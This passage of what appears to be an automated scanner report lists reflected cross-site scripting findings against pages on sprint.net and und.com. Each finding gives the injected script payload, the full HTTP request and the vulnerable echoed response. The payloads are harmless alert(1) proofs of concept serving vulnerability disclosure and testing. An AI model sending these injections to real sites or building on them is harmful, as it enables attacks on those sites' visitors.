Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:41 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/min27e50"><script>alert(1)</script>d3106908dc/" />
...[SNIP]...

5.85. https://www.sprint.net/performance [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d7db"><script>alert(1)</script>ec756d68c15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance3d7db"><script>alert(1)</script>ec756d68c15 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:11 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance3d7db"><script>alert(1)</script>ec756d68c15" />
...[SNIP]...

5.86. https://www.sprint.net/performance/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe549"><script>alert(1)</script>958e28ceb0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performancefe549"><script>alert(1)</script>958e28ceb0d/ HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1124; path=/
Date: Sun, 04 Sep 2011 00:48:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performancefe549"><script>alert(1)</script>958e28ceb0d/" />
...[SNIP]...

5.87. https://www.sprint.net/performance/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d08e2"><script>alert(1)</script>a80de0e0c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/?d08e2"><script>alert(1)</script>a80de0e0c3d=1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:50 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 12977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/?d08e2"><script>alert(1)</script>a80de0e0c3d=1" />
...[SNIP]...

5.88. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/gen_line_xml.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c9e"><script>alert(1)</script>ad88d874842 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance33c9e"><script>alert(1)</script>ad88d874842/gen_line_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:12 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance33c9e"><script>alert(1)</script>ad88d874842/gen_line_xml.php" />
...[SNIP]...

5.89. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/gen_line_xml.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8338f"><script>alert(1)</script>13d9de34be1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/gen_line_xml.php8338f"><script>alert(1)</script>13d9de34be1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:23 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/gen_line_xml.php8338f"><script>alert(1)</script>13d9de34be1" />
...[SNIP]...

5.90. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/gen_pop_xml.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90061"><script>alert(1)</script>413bc0303e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance90061"><script>alert(1)</script>413bc0303e6/gen_pop_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:37 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance90061"><script>alert(1)</script>413bc0303e6/gen_pop_xml.php" />
...[SNIP]...

5.91. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/gen_pop_xml.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c64e"><script>alert(1)</script>2f160f05d4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/gen_pop_xml.php7c64e"><script>alert(1)</script>2f160f05d4b HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:48:49 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/gen_pop_xml.php7c64e"><script>alert(1)</script>2f160f05d4b" />
...[SNIP]...

5.92. https://www.sprint.net/performance/performance.swf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/performance.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 380b8"><script>alert(1)</script>0c607eb5845 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance380b8"><script>alert(1)</script>0c607eb5845/performance.swf HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:31 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance380b8"><script>alert(1)</script>0c607eb5845/performance.swf" />
...[SNIP]...

5.93. https://www.sprint.net/performance/performance.swf [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/performance.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7085b"><script>alert(1)</script>c5bd3f6a3e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /performance/performance.swf7085b"><script>alert(1)</script>c5bd3f6a3e1 HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 404 Not Found
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:49:43 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" >
<head>

...[SNIP]...
<input type="hidden" name="request_uri" value="/performance/performance.swf7085b"><script>alert(1)</script>c5bd3f6a3e1" />
...[SNIP]...

5.94. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3f73"><script>alert(1)</script>312ccc6a7af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sportsb3f73"><script>alert(1)</script>312ccc6a7af/m-footbl/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:50 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sportsb3f73"><script>alert(1)</script>312ccc6a7af/m-footbl/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.95. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d066e"><script>alert(1)</script>1d9633a65ee was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbld066e"><script>alert(1)</script>1d9633a65ee/9873956 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:51 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbld066e"><script>alert(1)</script>1d9633a65ee/9873956','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.96. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c955e"><script>alert(1)</script>dfec6a8d34d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956c955e"><script>alert(1)</script>dfec6a8d34d HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:52 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956c955e"><script>alert(1)</script>dfec6a8d34d','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.97. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9873956

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ae9"><script>alert(1)</script>fcb6a136b80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footbl/9873956?99ae9"><script>alert(1)</script>fcb6a136b80=1 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:44:48 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 33922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footbl/9873956?99ae9"><script>alert(1)</script>fcb6a136b80=1','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.98. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c8b5"><script>alert(1)</script>815941a6815 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports9c8b5"><script>alert(1)</script>815941a6815/m-footbl/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:52 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports9c8b5"><script>alert(1)</script>815941a6815/m-footbl/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.99. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c09fe"><script>alert(1)</script>185ebd9758c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sports/m-footblc09fe"><script>alert(1)</script>185ebd9758c/9874134 HTTP/1.1
Host: www.und.com
Proxy-Connection: keep-alive
Referer: http://www.und.com/sports/m-footbl/nd-m-footbl-body.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LDCLGFbrowser=1502b25b-b7d1-4145-af20-3ce33b17a67e; __utma=46806371.1571180321.1315097071.1315097071.1315097071.1; __utmb=46806371.1.10.1315097071; __utmc=46806371; __utmz=46806371.1315097071.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 00:45:03 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private
Content-Length: 34116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="javascript:window.open('http://www.cstv.com/printable/schools/nd/sports/m-footblc09fe"><script>alert(1)</script>185ebd9758c/9874134','Printable','toolbar=no,location=no,resizable=no,scrollbars=yes,width=610,height=450'); void('');" class="PrinterFriendly">
...[SNIP]...

5.100. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.und.com
Path:	/sports/m-footbl/9874134

Issue detail

